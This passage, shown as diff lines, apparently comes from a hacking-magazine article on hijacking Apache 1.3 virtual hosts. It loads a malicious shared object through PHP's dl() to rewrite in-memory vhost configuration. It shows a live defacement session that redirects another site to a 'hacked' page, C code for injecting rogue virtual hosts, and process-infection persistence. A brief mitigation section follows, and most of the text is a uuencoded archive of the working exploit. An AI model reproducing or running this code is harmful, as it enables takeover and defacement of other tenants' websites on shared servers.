+NOTE: It depends on your compiler and compiler version which mov or push 
+call returns the correct address. So you can also use the integrated 
+disassembler to print the assembler code on your webpage.
+
+--[ 5 - A sample attack
+
+Imagine the following situtation:
+There are three directories (for each virtual host one) and three
+index.html files. Lets have a look at the content:
+
+andi@blowfish:/home$ ls -al hack1/ vhost1/ vhost2/
+hack1/:
+total 16
+drwxr-sr-x    2 andi     andi       4096 Apr 25 03:33 .
+drwxrwsr-x    7 root     staff      4096 Apr 25 03:00 ..
+-rw-r--r--    1 root     staff        20 Apr 25 02:19 index.html
+
+vhost1/:
+total 332
+drwxr-sr-x    2 andi     andi       4096 May  6 14:20 .
+drwxrwsr-x    7 root     staff      4096 Apr 25 03:00 ..
+-rw-r--r--    1 andi     andi        905 May  6 14:21 hoagie_apache_php.php
+-rwxr-xr-x    1 andi     andi     317265 May  6 14:25 hoagie_apache.so
+-rw-r--r--    1 root     andi         15 Apr 25 02:18 index.html
+
+vhost2/:
+total 16
+drwxr-sr-x    2 andi     andi       4096 Apr 25 03:31 .
+drwxrwsr-x    7 root     staff      4096 Apr 25 03:00 ..
+-rw-r--r--    1 root     andi         15 Apr 25 02:18 index.html
+-rw-r--r--    1 andi     andi         15 Apr 25 03:31 test.html
+andi@blowfish:/home$ cat hack1/index.html
+hacked!!!!!
+w0w0w0w
+andi@blowfish:/home$ cat vhost1/index.html
+www.vhost1.com
+andi@blowfish:/home$ cat vhost1/hoagie_apachephp.php
+...
+   if (php_hoagie_loaddl()) {
+      hoagie_setvhostdocumentroot("www.vhost2.com", "/home/hack1");
+   } else {
+      php_hoagie_debug("Cannot load " . PHP_MEM_MODULE);
+   }
+...
+andi@blowfish:/home$ cat vhost2/index.html
+www.vhost2.com
+andi@blowfish:/home$ cat /home/andi/bin/apache/conf/httpd.conf
+...
+<VirtualHost 172.16.0.123:8080>
+    ServerAdmin webmaster@vhost1.com
+    DocumentRoot /home/vhost1
+    ServerName www.vhost1.com
+    ErrorLog logs/www.vhost1.com-error_log
+    CustomLog logs/www.vhost1.com-access_log common
+</VirtualHost>
+
+<VirtualHost 172.16.0.123:8080>
+    ServerAdmin webmaster@vhost1.com
+    DocumentRoot /home/vhost2
+    ServerName www.vhost2.com
+    ErrorLog logs/www.vhost2.com-error_log
+    CustomLog logs/www.vhost2.com-access_log common
+</VirtualHost>
+...
+andi@blowfish:/home$
+
+So, before the attack we send some http requests and look for the correct
+answer.
+
+andi@blowfish:/home$ nc www.vhost1.com 8080
+GET / HTTP/1.0
+Host: www.vhost1.com
+
+HTTP/1.1 200 OK
+Date: Thu, 06 May 2004 12:52:58 GMT
+Server: Apache/1.3.29 (Unix) PHP/4.3.6
+Last-Modified: Sun, 25 Apr 2004 00:18:38 GMT
+ETag: "5a826-f-408b03de"
+Accept-Ranges: bytes
+Content-Length: 15
+Connection: close
+Content-Type: text/html
+
+www.vhost1.com
+andi@blowfish:/home$ nc www.vhost2.com 8080
+GET / HTTP/1.0
+Host: www.vhost2.com
+
+HTTP/1.1 200 OK
+Date: Thu, 06 May 2004 12:53:06 GMT
+Server: Apache/1.3.29 (Unix) PHP/4.3.6
+Last-Modified: Sun, 25 Apr 2004 00:18:46 GMT
+ETag: "5a827-f-408b03e6"
+Accept-Ranges: bytes
+Content-Length: 15
+Connection: close
+Content-Type: text/html
+
+www.vhost2.com
+andi@blowfish:/home$
+
+So now lets start the attack...
+andi@blowfish:/home$ /home/andi/bin/apache/bin/ab -n 200 -c 200 \
+http://www.vhost1.com:8080/hoagie_apachephp.php
+....
+andi@blowfish:/home$ nc www.vhost2.com 8080
+GET / HTTP/1.0
+Host: www.vhost2.com
+
+HTTP/1.1 200 OK
+Date: Thu, 06 May 2004 12:56:27 GMT
+Server: Apache/1.3.29 (Unix) PHP/4.3.6
+Last-Modified: Sun, 25 Apr 2004 00:19:57 GMT
+ETag: "1bc99-14-408b042d"
+Accept-Ranges: bytes
+Content-Length: 20
+Connection: close
+Content-Type: text/html
+
+hacked!!!!!
+w0w0w0w
+andi@blowfish:/home$ 
+
+--[ 6 - Add a new Virtual Host
+
+Instead of changing a virtual host we can also add a new one.
+We know that Apache uses iphash_table to lookup the correct virtual host
+corresponding to its IP address. So when we add a new virtual host we have 
+to calculate the hash key first. This is done by the function
+hash_inaddr():
+
+[apache_1.3.29/src/main/http_vhost.c]
+...
+static ap_inline unsigned hash_inaddr(unsigned key)
+{
+    key ^= (key >> 16);
+    return ((key >> 8) ^ key) % IPHASH_TABLE_SIZE;
+}
+...
+
+In most cases there's already an object of type name_chain (*names)
+because it's unusual that this IP address hasn't been used for another 
+vhost too. So we go through the names list and add an object of type
+name_chain. Before we can add a new object or variable we need to get the
+value of pconf for ap_palloc(). ap_palloc is Apache's malloc function. It
+uses pools to decide where to store data. The address of pconf is used in
+ap_register_other_child().
+
+Now we can create an object of type name_chain. Then we have to add a 
+server_addr_rec object where IP address and port information are stored
+(its used for IP address lookups). After that the more important object
+will be added: server_rec. We have to set the server administrator, server
+email, module config, directory config etc. Look at hoagie_apachephp.c in
+function hoagie_addvhost():
+
+...
+  /* allocate memory for new virtual host objects and it's sub objects */
+  nc = ap_palloc(pconf, sizeof(name_chain));
+  nc->next = NULL;
+
+  /* set IP address and port information */
+  nc->sar = ap_palloc(pconf, sizeof(server_addr_rec));
+  nc->sar->next = NULL;
+  nc->sar->host_addr.s_addr = ipaddr;
+  nc->sar->host_port = 8080;
+  nc->sar->virthost = ap_palloc(pconf, strlen(ipaddrstr) + 1);
+  strcpy(nc->sar->virthost, ipaddrstr);
+...
+
+Lets start apache bench again and infect the apache processes.
+
+--[ 7 - Keep it up
+
+Now we can infect apache processes that are running at the moment. But
+when there are many HTTP requests Apache creates also new processes that
+are not infected. 
+
+So what we do is we are redirecting the signal call for all running Apache
+processes. This is done by Runtime Process Infection (the .so way ;)). 
+Therefore after each new connection all running apache processes will be
+infected too. For more details see [4]. But this can only be done when
+Apache is not started by root because after a setuid() call with old uid is
+not equal to new uid Linux clears the dumpable flag of that process. This
+flag must be set if you want to ptrace() this process.
+
+--[ 8 - Solution?
+
+The best solution would be something like a read-only apache configuration
+in memory.
+
+For PHP you can simply disable the "dl()" function or enable safe mode for
+all your virtual hosts. When you're using mod_perl too, you have to disable
+the whole dl() family functions (see DynaLoader). Generally you can say 
+that every builtin Apache module is vulnerable to this kind of attack (when
+you can directly access memory locations). I implemented a proof of concept
+code for PHP and ModPerl because nowadays these script languages are 
+running on most of the apache web servers.
+
+--[ 9 - References
+
+  [1] Apache - http://www.apache.org
+
+  [2] PHP - http://www.php.net
+
+  [3] ModPerl - http://www.modperl.org
+
+  [4] Runtime Process Infection - http://www.phrack.org/show.php?p=59&a=8
+
+--[ A - Appendix: The implementation
+
+begin 644 hoagie_apache.tar.gz
+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
